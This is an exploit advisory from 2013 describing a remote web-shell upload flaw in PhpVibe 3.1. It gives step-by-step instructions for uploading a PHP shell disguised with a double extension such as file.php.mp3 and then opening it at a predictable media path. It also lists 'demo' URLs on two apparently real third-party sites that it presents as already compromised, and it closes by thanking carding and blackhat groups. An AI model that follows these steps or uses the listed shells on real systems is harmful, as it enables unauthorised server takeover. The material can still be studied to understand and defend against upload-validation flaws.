PhpVibe version 3.1 suffers from a remote shell upload vulnerability.
5f986cf1468601c9a88f20bd84f17fd1e3b3eb1767c9565d26314580885f8339
___________.__ _________ _________
\__ ___/| |__ ____ \_ ___ \_______ ______ _ ________ \_ ___ \_______ ______ _ __
| | | | \_/ __ \ / \ \/\_ __ \/ _ \ \/ \/ / ___/ / \ \/\_ __ \_/ __ \ \/ \/ /
| | | Y \ ___/ \ \____| | \( <_> ) /\___ \ \ \____| | \/\ ___/\ /
|____| |___| /\___ > \______ /|__| \____/ \/\_//____ > \______ /|__| \___ >\/\_/
\/ \/ \/ \/ \/ \/
http://thecrowscrew.org
#################################################################################################
Exploit Title: PhpVibe 3.1 Upload Shell Vulnerability
Google Dork: use ur brain :P
Date: 22/08/2013
Locations: Indonesia
Author: Gabby
Product: PhpVibe
Official site: http://phprevolution.com/
Risk Level: High
#################################################################################################
Poc :
u must regist first,. n go to video upload,.
http://site.com/upload
upload ur shell as extensi "file.php.mp3" / "file.php.mp4" / "file.php.flv
shell akses :
http://site.com/media/flv/month-date-year-time-minute-pm/am-file.php.mp3
Demo :
http://viralwire.co.uk/media/flv/august-21-13-10-57-pm-file.php.mp3
http://otelvideo.ru//media/flv/august-22-13-1-42-am-file.php.flv
#################################################################################################
Thanks to :
Catalyst71, kit4r0, 777r, ovanIsmycode, walangkaji, penjamoen, "Dad", my sista Wii, Red-x, all my luvly friend,..
Yogyacarderlink, SurabayaBlackhat, n for Someone, i cant say his name,. thanks for give me idea..^^